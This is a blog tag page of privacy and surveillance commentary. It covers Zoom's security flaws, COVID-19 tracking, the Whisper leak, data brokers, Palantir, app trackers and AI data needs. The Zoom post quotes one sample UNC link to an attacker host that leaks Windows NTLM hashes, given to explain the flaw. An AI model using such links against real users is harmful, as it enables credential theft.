Entries Tagged "data collection"

Page 3 of 7

Security and Privacy Implications of Zoom

Over the past few weeks, Zoom’s use has exploded since it became the video conferencing platform of choice in today’s COVID-19 world. (My own university, Harvard, uses it for all of its classes. Boris Johnson had a cabinet meeting over Zoom.) Over that same period, the company has been exposed for having both lousy privacy and lousy security. My goal here is to summarize all of the problems and talk about solutions and workarounds.

In general, Zoom’s problems fall into three broad buckets: (1) bad privacy practices, (2) bad security practices, and (3) bad user configurations.

Privacy first: Zoom spies on its users for personal profit. It seems to have cleaned this up somewhat since everyone started paying attention, but it still does it.

The company collects a laundry list of data about you, including user name, physical address, email address, phone number, job information, Facebook profile information, computer or phone specs, IP address, and any other information you create or upload. And it uses all of this surveillance data for profit, against your interests.

Last month, Zoom’s privacy policy contained this bit:

Does Zoom sell Personal Data? Depends what you mean by “sell.” We do not allow marketing companies, or anyone else to access Personal Data in exchange for payment. Except as described above, we do not allow any third parties to access any Personal Data we collect in the course of providing services to users. We do not allow third parties to use any Personal Data obtained from us for their own purposes, unless it is with your consent (e.g. when you download an app from the Marketplace. So in our humble opinion, we don’t think most of our users would see us as selling their information, as that practice is commonly understood.

“Depends what you mean by ‘sell.'” “…most of our users would see us as selling…” “…as that practice is commonly understood.” That paragraph was carefully worded by lawyers to permit them to do pretty much whatever they want with your information while pretending otherwise. Do any of you who “download[ed] an app from the Marketplace” remember consenting to them giving your personal data to third parties? I don’t.

Doc Searls has been all over this, writing about the surprisingly large number of third-party trackers on the Zoom website and its poor privacy practices in general.

On March 29th, Zoom rewrote its privacy policy:

We do not sell your personal data. Whether you are a business or a school or an individual user, we do not sell your data.

[…]

We do not use data we obtain from your use of our services, including your meetings, for any advertising. We do use data we obtain from you when you visit our marketing websites, such as zoom.us and zoom.com. You have control over your own cookie settings when visiting our marketing websites.

There’s lots more. It’s better than it was, but Zoom still collects a huge amount of data about you. And note that it considers its home pages “marketing websites,” which means it’s still using third-party trackers and surveillance based advertising. (Honestly, Zoom, just stop doing it.)

Now security: Zoom’s security is at best sloppy, and malicious at worst. Motherboard reported that Zoom’s iPhone app was sending user data to Facebook, even if the user didn’t have a Facebook account. Zoom removed the feature, but its response should worry you about its sloppy coding practices in general:

“We originally implemented the ‘Login with Facebook’ feature using the Facebook SDK in order to provide our users with another convenient way to access our platform. However, we were recently made aware that the Facebook SDK was collecting unnecessary device data,” Zoom told Motherboard in a statement on Friday.

This isn’t the first time Zoom was sloppy with security. Last year, a researcher discovered that a vulnerability in the Mac Zoom client allowed any malicious website to enable the camera without permission. This seemed like a deliberate design choice: that Zoom designed its service to bypass browser security settings and remotely enable a user’s web camera without the user’s knowledge or consent. (EPIC filed an FTC complaint over this.) Zoom patched this vulnerability last year.

On 4/1, we learned that Zoom for Windows can be used to steal users’ Window credentials.

Attacks work by using the Zoom chat window to send targets a string of text that represents the network location on the Windows device they’re using. The Zoom app for Windows automatically converts these so-called universal naming convention strings—such as \attacker.example.com/C$—into clickable links. In the event that targets click on those links on networks that aren’t fully locked down, Zoom will send the Windows usernames and the corresponding NTLM hashes to the address contained in the link.

On 4/2, we learned that Zoom secretly displayed data from people’s LinkedIn profiles, which allowed some meeting participants to snoop on each other. (Zoom has fixed this one.)

I’m sure lots more of these bad security decisions, sloppy coding mistakes, and random software vulnerabilities are coming.

But it gets worse. Zoom’s encryption is awful. First, the company claims that it offers end-to-end encryption, but it doesn’t. It only provides link encryption, which means everything is unencrypted on the company’s servers. From the Intercept:

In Zoom’s white paper, there is a list of “pre-meeting security capabilities” that are available to the meeting host that starts with “Enable an end-to-end (E2E) encrypted meeting.” Later in the white paper, it lists “Secure a meeting with E2E encryption” as an “in-meeting security capability” that’s available to meeting hosts. When a host starts a meeting with the “Require Encryption for 3rd Party Endpoints” setting enabled, participants see a green padlock that says, “Zoom is using an end to end encrypted connection” when they mouse over it.

But when reached for comment about whether video meetings are actually end-to-end encrypted, a Zoom spokesperson wrote, “Currently, it is not possible to enable E2E encryption for Zoom video meetings. Zoom video meetings use a combination of TCP and UDP. TCP connections are made using TLS and UDP connections are encrypted with AES using a key negotiated over a TLS connection.”

They’re also lying about the type of encryption. On 4/3, Citizen Lab reported

Zoom documentation claims that the app uses “AES-256” encryption for meetings where possible. However, we find that in each Zoom meeting, a single AES-128 key is used in ECB mode by all participants to encrypt and decrypt audio and video. The use of ECB mode is not recommended because patterns present in the plaintext are preserved during encryption.

The AES-128 keys, which we verified are sufficient to decrypt Zoom packets intercepted in Internet traffic, appear to be generated by Zoom servers, and in some cases, are delivered to participants in a Zoom meeting through servers in China, even when all meeting participants, and the Zoom subscriber’s company, are outside of China.

I’m okay with AES-128, but using ECB (electronic codebook) mode indicates that there is no one at the company who knows anything about cryptography.

And that China connection is worrisome. Citizen Lab again:

Zoom, a Silicon Valley-based company, appears to own three companies in China through which at least 700 employees are paid to develop Zoom’s software. This arrangement is ostensibly an effort at labor arbitrage: Zoom can avoid paying US wages while selling to US customers, thus increasing their profit margin. However, this arrangement may make Zoom responsive to pressure from Chinese authorities.

Or from Chinese programmers slipping backdoors into the code at the request of the government.

Finally, bad user configuration. Zoom has a lot of options. The defaults aren’t great, and if you don’t configure your meetings right you’re leaving yourself open to all sort of mischief.

Zoombombing” is the most visible problem. People are finding open Zoom meetings, classes, and events: joining them, and sharing their screens to broadcast offensive content—porn, mostly—to everyone. It’s awful if you’re the victim, and a consequence of allowing any participant to share their screen.

Even without screen sharing, people are logging in to random Zoom meetings and disrupting them. Turns out that Zoom didn’t make the meeting ID long enough to prevent someone from randomly trying them, looking for meetings. This isn’t new; Checkpoint Research reported this last summer. Instead of making the meeting IDs longer or more complicated—which it should have done—it enabled meeting passwords by default. Of course most of us don’t use passwords, and there are now automatic tools for finding Zoom meetings.

For help securing your Zoom sessions, Zoom has a good guide. Short summary: don’t share the meeting ID more than you have to, use a password in addition to a meeting ID, use the waiting room if you can, and pay attention to who has what permissions.

That’s what we know about Zoom’s privacy and security so far. Expect more revelations in the weeks and months to come. The New York Attorney General is investigating the company. Security researchers are combing through the software, looking for other things Zoom is doing and not telling anyone about. There are more stories waiting to be discovered.

Zoom is a security and privacy disaster, but until now had managed to avoid public accountability because it was relatively obscure. Now that it’s in the spotlight, it’s all coming out. (Their 4/1 response to all of this is here.) On 4/2, the company said it would freeze all feature development and focus on security and privacy. Let’s see if that’s anything more than a PR move.

In the meantime, you should either lock Zoom down as best you can, or—better yet—abandon the platform altogether. Jitsi is a distributed, free, and open-source alternative. Start your meeting here.

EDITED TO ADD: Fight for the Future is on this.

Steve Bellovin’s comments.

Meanwhile, lots of Zoom video recordings are available on the Internet. The article doesn’t have any useful details about how they got there:

Videos viewed by The Post included one-on-one therapy sessions; a training orientation for workers doing telehealth calls, which included people’s names and phone numbers; small-business meetings, which included private company financial statements; and elementary-school classes, in which children’s faces, voices and personal details were exposed.

Many of the videos include personally identifiable information and deeply intimate conversations, recorded in people’s homes. Other videos include nudity, such as one in which an aesthetician teaches students how to give a Brazilian wax.

[…]

Many of the videos can be found on unprotected chunks of Amazon storage space, known as buckets, which are widely used across the Web. Amazon buckets are locked down by default, but many users make the storage space publicly accessible either inadvertently or to share files with other people.

EDITED TO ADD (4/4): New York City has banned Zoom from its schools.

EDITED TO ADD: This post has been translated into Spanish.

Posted on April 3, 2020 at 10:10 AMView Comments

Emergency Surveillance During COVID-19 Crisis

Israel is using emergency surveillance powers to track people who may have COVID-19, joining China and Iran in using mass surveillance in this way. I believe pressure will increase to leverage existing corporate surveillance infrastructure for these purposes in the US and other countries. With that in mind, the EFF has some good thinking on how to balance public safety with civil liberties:

Thus, any data collection and digital monitoring of potential carriers of COVID-19 should take into consideration and commit to these principles:

  • Privacy intrusions must be necessary and proportionate. A program that collects, en masse, identifiable information about people must be scientifically justified and deemed necessary by public health experts for the purpose of containment. And that data processing must be proportionate to the need. For example, maintenance of 10 years of travel history of all people would not be proportionate to the need to contain a disease like COVID-19, which has a two-week incubation period.
  • Data collection based on science, not bias. Given the global scope of communicable diseases, there is historical precedent for improper government containment efforts driven by bias based on nationality, ethnicity, religion, and race­—rather than facts about a particular individual’s actual likelihood of contracting the virus, such as their travel history or contact with potentially infected people. Today, we must ensure that any automated data systems used to contain COVID-19 do not erroneously identify members of specific demographic groups as particularly susceptible to infection.
  • Expiration. As in other major emergencies in the past, there is a hazard that the data surveillance infrastructure we build to contain COVID-19 may long outlive the crisis it was intended to address. The government and its corporate cooperators must roll back any invasive programs created in the name of public health after crisis has been contained.
  • Transparency. Any government use of “big data” to track virus spread must be clearly and quickly explained to the public. This includes publication of detailed information about the information being gathered, the retention period for the information, the tools used to process that information, the ways these tools guide public health decisions, and whether these tools have had any positive or negative outcomes.
  • Due Process. If the government seeks to limit a person’s rights based on this “big data” surveillance (for example, to quarantine them based on the system’s conclusions about their relationships or travel), then the person must have the opportunity to timely and fairly challenge these conclusions and limits.

Posted on March 20, 2020 at 6:25 AMView Comments

The Whisper Secret-Sharing App Exposed Locations

This is a big deal:

Whisper, the secret-sharing app that called itself the “safest place on the Internet,” left years of users’ most intimate confessions exposed on the Web tied to their age, location and other details, raising alarm among cybersecurity researchers that users could have been unmasked or blackmailed.

[…]

The records were viewable on a non-password-protected database open to the public Web. A Post reporter was able to freely browse and search through the records, many of which involved children: A search of users who had listed their age as 15 returned 1.3 million results.

[…]

The exposed records did not include real names but did include a user’s stated age, ethnicity, gender, hometown, nickname and any membership in groups, many of which are devoted to sexual confessions and discussion of sexual orientation and desires.

The data also included the location coordinates of the users’ last submitted post, many of which pointed back to specific schools, workplaces and residential neighborhoods.

Or homes. I hope people didn’t confess things from their bedrooms.

Posted on March 12, 2020 at 6:30 AMView Comments

Collating Hacked Data Sets

Two Harvard undergraduates completed a project where they went out on the dark web and found a bunch of stolen datasets. Then they correlated all the information, and combined it with additional, publicly available, information. No surprise: the result was much more detailed and personal.

“What we were able to do is alarming because we can now find vulnerabilities in people’s online presence very quickly,” Metropolitansky said. “For instance, if I can aggregate all the leaked credentials associated with you in one place, then I can see the passwords and usernames that you use over and over again.”

Of the 96,000 passwords contained in the dataset the students used, only 26,000 were unique.

“We also showed that a cyber criminal doesn’t have to have a specific victim in mind. They can now search for victims who meet a certain set of criteria,” Metropolitansky said.

For example, in less than 10 seconds she produced a dataset with more than 1,000 people who have high net worth, are married, have children, and also have a username or password on a cheating website. Another query pulled up a list of senior-level politicians, revealing the credit scores, phone numbers, and addresses of three U.S. senators, three U.S. representatives, the mayor of Washington, D.C., and a Cabinet member.

“Hopefully, this serves as a wake-up call that leaks are much more dangerous than we think they are,” Metropolitansky said. “We’re two college students. If someone really wanted to do some damage, I’m sure they could use these same techniques to do something horrible.”

That’s about right.

And you can be sure that the world’s major intelligence organizations have already done all of this.

Posted on January 30, 2020 at 8:39 AMView Comments

Customer Tracking at Ralphs Grocery Store

To comply with California’s new data privacy law, companies that collect information on consumers and users are forced to be more transparent about it. Sometimes the results are creepy. Here’s an article about Ralphs, a California supermarket chain owned by Kroger:

…the form proceeds to state that, as part of signing up for a rewards card, Ralphs “may collect” information such as “your level of education, type of employment, information about your health and information about insurance coverage you might carry.”

It says Ralphs may pry into “financial and payment information like your bank account, credit and debit card numbers, and your credit history.”

Wait, it gets even better.

Ralphs says it’s gathering “behavioral information” such as “your purchase and transaction histories” and “geolocation data,” which could mean the specific Ralphs aisles you browse or could mean the places you go when not shopping for groceries, thanks to the tracking capability of your smartphone.

Ralphs also reserves the right to go after “information about what you do online” and says it will make “inferences” about your interests “based on analysis of other information we have collected.”

Other information? This can include files from “consumer research firms” ­—read: professional data brokers ­—and “public databases,” such as property records and bankruptcy filings.

The reaction from John Votava, a Ralphs spokesman:

“I can understand why it raises eyebrows,” he said. We may need to change the wording on the form.”

That’s the company’s solution. Don’t spy on people less, just change the wording so they don’t realize it.

More consumer protection laws will be required.

Posted on January 29, 2020 at 6:20 AMView Comments

Palantir's Surveillance Service for Law Enforcement

Motherboard got its hands on Palantir’s Gotham user’s manual, which is used by the police to get information on people:

The Palantir user guide shows that police can start with almost no information about a person of interest and instantly know extremely intimate details about their lives. The capabilities are staggering, according to the guide:

  • If police have a name that’s associated with a license plate, they can use automatic license plate reader data to find out where they’ve been, and when they’ve been there. This can give a complete account of where someone has driven over any time period.
  • With a name, police can also find a person’s email address, phone numbers, current and previous addresses, bank accounts, social security number(s), business relationships, family relationships, and license information like height, weight, and eye color, as long as it’s in the agency’s database.
  • The software can map out a person’s family members and business associates of a suspect, and theoretically, find the above information about them, too.

All of this information is aggregated and synthesized in a way that gives law enforcement nearly omniscient knowledge over any suspect they decide to surveil.

Read the whole article—it has a lot of details. This seems like a commercial version of the NSA’s XKEYSCORE.

Boing Boing post.

Meanwhile:

The FBI wants to gather more information from social media. Today, it issued a call for contracts for a new social media monitoring tool. According to a request-for-proposals (RFP), it’s looking for an “early alerting tool” that would help it monitor terrorist groups, domestic threats, criminal activity and the like.

The tool would provide the FBI with access to the full social media profiles of persons-of-interest. That could include information like user IDs, emails, IP addresses and telephone numbers. The tool would also allow the FBI to track people based on location, enable persistent keyword monitoring and provide access to personal social media history. According to the RFP, “The mission-critical exploitation of social media will enable the Bureau to detect, disrupt, and investigate an ever growing diverse range of threats to U.S. National interests.”

Posted on July 15, 2019 at 6:12 AMView Comments

iPhone Apps Surreptitiously Communicated with Unknown Servers

Long news article (alternate source) on iPhone privacy, specifically the enormous amount of data your apps are collecting without your knowledge. A lot of this happens in the middle of the night, when you’re probably not otherwise using your phone:

IPhone apps I discovered tracking me by passing information to third parties ­ just while I was asleep ­ include Microsoft OneDrive, Intuit’s Mint, Nike, Spotify, The Washington Post and IBM’s the Weather Channel. One app, the crime-alert service Citizen, shared personally identifiable information in violation of its published privacy policy.

And your iPhone doesn’t only feed data trackers while you sleep. In a single week, I encountered over 5,400 trackers, mostly in apps, not including the incessant Yelp traffic.

Posted on June 25, 2019 at 6:35 AMView Comments

Data, Surveillance, and the AI Arms Race

According to foreign policy experts and the defense establishment, the United States is caught in an artificial intelligence arms race with China—one with serious implications for national security. The conventional version of this story suggests that the United States is at a disadvantage because of self-imposed restraints on the collection of data and the privacy of its citizens, while China, an unrestrained surveillance state, is at an advantage. In this vision, the data that China collects will be fed into its systems, leading to more powerful AI with capabilities we can only imagine today. Since Western countries can’t or won’t reap such a comprehensive harvest of data from their citizens, China will win the AI arms race and dominate the next century.

This idea makes for a compelling narrative, especially for those trying to justify surveillance—whether government- or corporate-run. But it ignores some fundamental realities about how AI works and how AI research is conducted.

Thanks to advances in machine learning, AI has flipped from theoretical to practical in recent years, and successes dominate public understanding of how it works. Machine learning systems can now diagnose pneumonia from X-rays, play the games of go and poker, and read human lips, all better than humans. They’re increasingly watching surveillance video. They are at the core of self-driving car technology and are playing roles in both intelligence-gathering and military operations. These systems monitor our networks to detect intrusions and look for spam and malware in our email.

And it’s true that there are differences in the way each country collects data. The United States pioneered “surveillance capitalism,” to use the Harvard University professor Shoshana Zuboff’s term, where data about the population is collected by hundreds of large and small companies for corporate advantage—and mutually shared or sold for profit The state picks up on that data, in cases such as the Centers for Disease Control and Prevention’s use of Google search data to map epidemics and evidence shared by alleged criminals on Facebook, but it isn’t the primary user.

China, on the other hand, is far more centralized. Internet companies collect the same sort of data, but it is shared with the government, combined with government-collected data, and used for social control. Every Chinese citizen has a national ID number that is demanded by most services and allows data to easily be tied together. In the western region of Xinjiang, ubiquitous surveillance is used to oppress the Uighur ethnic minority—although at this point there is still a lot of human labor making it all work. Everyone expects that this is a test bed for the entire country.

Data is increasingly becoming a part of control for the Chinese government. While many of these plans are aspirational at the moment—there isn’t, as some have claimed, a single “social credit score,” but instead future plans to link up a wide variety of systems—data collection is universally pushed as essential to the future of Chinese AI. One executive at search firm Baidu predicted that the country’s connected population will provide them with the raw data necessary to become the world’s preeminent tech power. China’s official goal is to become the world AI leader by 2030, aided in part by all of this massive data collection and correlation.

This all sounds impressive, but turning massive databases into AI capabilities doesn’t match technological reality. Current machine learning techniques aren’t all that sophisticated. All modern AI systems follow the same basic methods. Using lots of computing power, different machine learning models are tried, altered, and tried again. These systems use a large amount of data (the training set) and an evaluation function to distinguish between those models and variations that work well and those that work less well. After trying a lot of models and variations, the system picks the one that works best. This iterative improvement continues even after the system has been fielded and is in use.

So, for example, a deep learning system trying to do facial recognition will have multiple layers (hence the notion of “deep”) trying to do different parts of the facial recognition task. One layer will try to find features in the raw data of a picture that will help find a face, such as changes in color that will indicate an edge. The next layer might try to combine these lower layers into features like shapes, looking for round shapes inside of ovals that indicate eyes on a face. The different layers will try different features and will be compared by the evaluation function until the one that is able to give the best results is found, in a process that is only slightly more refined than trial and error.

Large data sets are essential to making this work, but that doesn’t mean that more data is automatically better or that the system with the most data is automatically the best system. Train a facial recognition algorithm on a set that contains only faces of white men, and the algorithm will have trouble with any other kind of face. Use an evaluation function that is based on historical decisions, and any past bias is learned by the algorithm. For example, mortgage loan algorithms trained on historic decisions of human loan officers have been found to implement redlining. Similarly, hiring algorithms trained on historical data manifest the same sexism as human staff often have. Scientists are constantly learning about how to train machine learning systems, and while throwing a large amount of data and computing power at the problem can work, more subtle techniques are often more successful. All data isn’t created equal, and for effective machine learning, data has to be both relevant and diverse in the right ways.

Future research advances in machine learning are focused on two areas. The first is in enhancing how these systems distinguish between variations of an algorithm. As different versions of an algorithm are run over the training data, there needs to be some way of deciding which version is “better.” These evaluation functions need to balance the recognition of an improvement with not over-fitting to the particular training data. Getting functions that can automatically and accurately distinguish between two algorithms based on minor differences in the outputs is an art form that no amount of data can improve.

The second is in the machine learning algorithms themselves. While much of machine learning depends on trying different variations of an algorithm on large amounts of data to see which is most successful, the initial formulation of the algorithm is still vitally important. The way the algorithms interact, the types of variations attempted, and the mechanisms used to test and redirect the algorithms are all areas of active research. (An overview of some of this work can be found here; even trying to limit the research to 20 papers oversimplifies the work being done in the field.) None of these problems can be solved by throwing more data at the problem.

The British AI company DeepMind’s success in teaching a computer to play the Chinese board game go is illustrative. Its AlphaGo computer program became a grandmaster in two steps. First, it was fed some enormous number of human-played games. Then, the game played itself an enormous number of times, improving its own play along the way. In 2016, AlphaGo beat the grandmaster Lee Sedol four games to one.

While the training data in this case, the human-played games, was valuable, even more important was the machine learning algorithm used and the function that evaluated the relative merits of different game positions. Just one year later, DeepMind was back with a follow-on system: AlphaZero. This go-playing computer dispensed entirely with the human-played games and just learned by playing against itself over and over again. It plays like an alien. (It also became a grandmaster in chess and shogi.)

These are abstract games, so it makes sense that a more abstract training process works well. But even something as visceral as facial recognition needs more than just a huge database of identified faces in order to work successfully. It needs the ability to separate a face from the background in a two-dimensional photo or video and to recognize the same face in spite of changes in angle, lighting, or shadows. Just adding more data may help, but not nearly as much as added research into what to do with the data once we have it.

Meanwhile, foreign-policy and defense experts are talking about AI as if it were the next nuclear arms race, with the country that figures it out best or first becoming the dominant superpower for the next century. But that didn’t happen with nuclear weapons, despite research only being conducted by governments and in secret. It certainly won’t happen with AI, no matter how much data different nations or companies scoop up.

It is true that China is investing a lot of money into artificial intelligence research: The Chinese government believes this will allow it to leapfrog other countries (and companies in those countries) and become a major force in this new and transformative area of computing—and it may be right. On the other hand, much of this seems to be a wasteful boondoggle. Slapping “AI” on pretty much anything is how to get funding. The Chinese Ministry of Education, for instance, promises to produce “50 world-class AI textbooks,” with no explanation of what that means.

In the democratic world, the government is neither the leading researcher nor the leading consumer of AI technologies. AI research is much more decentralized and academic, and it is conducted primarily in the public eye. Research teams keep their training data and models proprietary but freely publish their machine learning algorithms. If you wanted to work on machine learning right now, you could download Microsoft’s Cognitive Toolkit, Google’s Tensorflow, or Facebook’s Pytorch. These aren’t toy systems; these are the state-of-the art machine learning platforms.

AI is not analogous to the big science projects of the previous century that brought us the atom bomb and the moon landing. AI is a science that can be conducted by many different groups with a variety of different resources, making it closer to computer design than the space race or nuclear competition. It doesn’t take a massive government-funded lab for AI research, nor the secrecy of the Manhattan Project. The research conducted in the open science literature will trump research done in secret because of the benefits of collaboration and the free exchange of ideas.

While the United States should certainly increase funding for AI research, it should continue to treat it as an open scientific endeavor. Surveillance is not justified by the needs of machine learning, and real progress in AI doesn’t need it.

This essay was written with Jim Waldo, and previously appeared in Foreign Policy.

Posted on June 17, 2019 at 5:52 AMView Comments

Sidebar photo of Bruce Schneier by Joe MacInnis.